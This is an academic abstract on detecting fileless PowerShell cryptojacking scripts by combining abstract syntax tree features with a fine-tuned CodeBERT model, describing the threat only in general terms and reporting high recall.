This work proposes a novel detection method for fileless PowerShell-based cryptojacking attacks, which are notoriously difficult to identify—particularly when malicious scripts persist after their source code has been erased. By integrating abstract syntax tree (AST) representations with a fine-tuned CodeBERT model, the approach leverages the structural semantics of PowerShell scripts to enhance detection accuracy. The authors construct a dedicated experimental dataset and inject structured AST information into the pre-trained code language model, subsequently combining it with a machine learning classifier to achieve high precision and recall in identifying malicious behaviors. This study represents the first effort to combine AST-derived structural features with CodeBERT for PowerShell security analysis, demonstrating a significant improvement in detecting stealthy malicious scripts and validating the effectiveness of structure-aware pre-trained models in programming language–based threat detection.

With the emergence of remote code execution (RCE) vulnerabilities in ubiquitous libraries and advanced social engineering techniques, threat actors have started conducting widespread fileless cryptojacking attacks. These attacks have become effective with stealthy techniques based on PowerShell-based exploitation in Windows OS environments. Even if attacks are detected and malicious scripts removed, processes may remain operational on victim endpoints, creating a significant challenge for detection mechanisms. In this paper, we conducted an experimental study with a collected dataset on detecting PowerShell-based fileless cryptojacking scripts. The results showed that Abstract Syntax Tree (AST)-based fine-tuned CodeBERT achieved a high recall rate, proving the importance of the use of AST integration and fine-tuned pre-trained models for programming language.